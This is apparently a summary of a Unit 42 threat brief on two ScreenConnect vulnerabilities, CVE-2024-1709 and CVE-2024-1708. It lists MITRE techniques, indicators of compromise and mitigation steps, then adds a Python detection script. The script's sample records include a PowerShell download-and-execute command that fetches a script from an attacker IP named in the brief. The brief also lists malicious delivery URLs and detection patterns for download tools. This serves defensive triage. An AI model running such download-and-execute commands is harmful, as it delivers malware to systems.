Keypoints
- Two vulnerabilities affect ConnectWise ScreenConnect 23.9.7 and prior: CVE-2024-1709 (authentication bypass, critical) and CVE-2024-1708 (path traversal, high).
- CVE-2024-1709 is trivially exploitable; proof-of-concept exploits and a Metasploit unauthenticated RCE module are publicly available.
- Unit 42 observed 18,188 unique IPs hosting ScreenConnect globally, with concentrated exposure in the United States.
- Threat actors have distributed malicious installers and payloads (ransomware, stealers, Cobalt Strike), using URLs and sideloading techniques to deliver loaders and DLLs.
- ConnectWise patched cloud-hosted instances and released guidance to patch self-hosted/on-prem systems; license restrictions were lifted to allow upgrades of older versions.
- Palo Alto Networks published protections (Threat Prevention signature 95048, URL/DNS categorization, Cortex XDR/XSIAM rules, and Cortex Xpanse attack surface rules) and Unit 42 is providing incident response support.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Exploitation of ScreenConnect vulnerabilities allowing remote code execution (“…path-traversal vulnerability, which may allow an attacker the ability to execute remote code…”)
- [T1556] Modify Authentication Process – Authentication bypass via alternate path/channel (“…authentication bypass using an alternate path or channel vulnerability…”)
- [T1574.002] Hijack Execution Flow: DLL Side-Loading – Adversaries use legitimate binaries to load malicious DLLs (“…Malicious DLL Component (Loader)”; “Clean File used for sideloading malicious DLL”)
- [T1059.001] Command and Scripting Interpreter: PowerShell – Use of PowerShell scripts to decode and deploy malware (“…all.ps1 – Malicious Script downloads payload…”; “Decoded PowerShell script”)
- [T1105] Ingress Tool Transfer – Downloading payloads and installers from remote URLs (“…hxxp://185.232.92.32:8888/all.ps1”; “hxxps://transfer.sh/get/6YoVhBPfKE/temp2.exe”)
- [T1071.001] Application Layer Protocol: Web Protocols – Use of HTTP(S) endpoints for payload delivery and C2 (“…hxxp://159.65.130.146:4444/svchost.exe”; multiple hxxp:// URLs listed)
- [T1486] Data Encrypted for Impact – Deployment of ransomware executables observed (“enc.exe ransomware executable”; “crypt64ult.exe ransomware executable”)
Indicators of Compromise
- [IP Address] ScreenConnect hosts and actor infrastructure – 155.133.5.15, 155.133.5.14 (ConnectWise-identified), and 118.69.65.60
- [SHA256 hashes] Malicious binaries and scripts – 0d185ea3b0a49c2fa65bfd2757c9d0705657f0639fd36f196ac394fcd38c361d, 19fc383683b34ba31ed055dc2e546a64eecbe06d79b6cc346773478c84f25f92, and 19 more hashes
- [URLs] Payload and distribution endpoints used by actors – hxxp://185.232.92.32:8888/all.ps1, hxxps://transfer.sh/get/6YoVhBPfKE/temp2.exe, and other malicious URLs (e.g., hxxp://207.246.74.189:804/download/Diablo.log)
- [Filenames] Notable malicious filenames observed – “enc.exe” (ransomware), “UpdaterScreenConnect.exe” (malicious impostor), “SentinelAgentCore.dll” (malicious loader)
ConnectWise ScreenConnect versions up to 23.9.7 contain two flaws: CVE-2024-1709 (a trivial authentication bypass allowing unauthenticated access and RCE, rated critical) and CVE-2024-1708 (a path-traversal vulnerability enabling remote code execution or data access, rated high). Proof-of-concept code and a Metasploit module for CVE-2024-1709 are public, and Unit 42 observed thousands of exposed ScreenConnect hosts, increasing the risk of rapid exploitation. Multiple malicious infrastructure indicators and payloads have been documented, including hosted scripts (all.ps1), DLL loaders (SentinelAgentCore.dll), ransomware binaries (enc.exe, crypt64ult.exe), and standalone installers distributed via transfer.sh and HTTP endpoints.
Observed attacker behavior follows a consistent technical pattern: exploit the public-facing ScreenConnect service to bypass authentication or traverse paths, then fetch and execute secondary payloads via HTTP(S) (PowerShell scripts, EXEs, and DLLs). Adversaries use DLL sideloading to run malicious loaders, deploy payloads such as Cobalt Strike beacons and ransomware, and host distribution files on attacker-controlled IPs and transfer services. IOCs include multiple IP addresses, numerous SHA256 hashes of payloads and loaders, and URLs used for delivery and staging; defenders should treat any matching indicators as high priority.
Mitigation guidance: immediate patching or upgrade of self-hosted ScreenConnect instances to fixed versions is required (cloud-hosted screenconnect.com and hostedrmm.com instances were updated by ConnectWise). Where patching is delayed, block known malicious IPs/URLs and apply detections for PowerShell download-and-execute activity, DLL side-loading, and exploit attempts against ScreenConnect. Palo Alto Networks customers can deploy Threat Prevention signature 95048, Advanced URL/DNS filtering, and Cortex XDR/XSIAM/Xpanse rules to detect and block related exploitation and post-exploitation activity; Unit 42 also offers incident response support for compromised environments.
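As an added example (not Unit 42's or ConnectWise's code) of the version and detection checks the guidance above calls for, the following Python flags self-hosted builds in the affected range and scans constructed process-creation records for PowerShell download-and-execute activity and for the hosts and filenames listed in this brief. The event fields, regexes and sample records are assumptions made for the example.

```python
import re

LAST_VULNERABLE = (23, 9, 7)  # affected range from the brief: ScreenConnect 23.9.7 and prior

# Hosts and filenames quoted in the brief (the source defangs URLs as "hxxp").
IOC_HOSTS = {"155.133.5.15", "155.133.5.14", "118.69.65.60", "185.232.92.32",
             "159.65.130.146", "207.246.74.189", "transfer.sh"}
IOC_FILES = {"enc.exe", "crypt64ult.exe", "updaterscreenconnect.exe",
             "sentinelagentcore.dll", "all.ps1", "temp2.exe", "diablo.log"}

# Common PowerShell download-and-execute primitives, plus a host extractor that accepts defanged URLs.
CRADLE = re.compile(r"\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr|Invoke-Expression|iex"
                    r"|Start-BitsTransfer|curl|wget)\b", re.I)
URL_HOST = re.compile(r"h(?:xx|tt)ps?://([\w.-]+)", re.I)

def is_affected_version(version: str) -> bool:
    """True when a self-hosted build string (e.g. "23.9.7.8817") is 23.9.7 or older."""
    parts = tuple(int(p) for p in version.strip().split(".")[:3])
    return parts <= LAST_VULNERABLE

def triage(events):
    """Return (event index, reason) for each process-creation record matching the brief."""
    hits = []
    for i, ev in enumerate(events):
        cmd, image = ev["cmd"], ev["image"].lower()
        hosts = {h.lower() for h in URL_HOST.findall(cmd)}
        if hosts & IOC_HOSTS:
            hits.append((i, "contacts known-malicious host"))
        elif hosts and image in ("powershell.exe", "pwsh.exe") and CRADLE.search(cmd):
            hits.append((i, "PowerShell download-and-execute to unlisted host"))
        if any(name in cmd.lower() for name in IOC_FILES):
            hits.append((i, "references a malicious filename from the brief"))
    return hits

# Constructed sample records (not real telemetry); 203.0.113.7 is a documentation address.
SAMPLE_EVENTS = [
    {"image": "powershell.exe", "cmd": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                                       ".DownloadString('http://185.232.92.32:8888/all.ps1')\""},
    {"image": "powershell.exe", "cmd": "powershell -c \"Get-Service ScreenConnect*\""},
    {"image": "powershell.exe", "cmd": "powershell -c \"iwr http://203.0.113.7/update.exe -OutFile u.exe\""},
    {"image": "cmd.exe", "cmd": "cmd /c copy SentinelAgentCore.dll C:\\Users\\Public\\"},
]

if __name__ == "__main__":
    print(is_affected_version("23.9.7.8817"), triage(SAMPLE_EVENTS))
```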
Read more: https://unit42.paloaltonetworks.com/connectwise-threat-brief-cve-2024-1708-cve-2024-1709/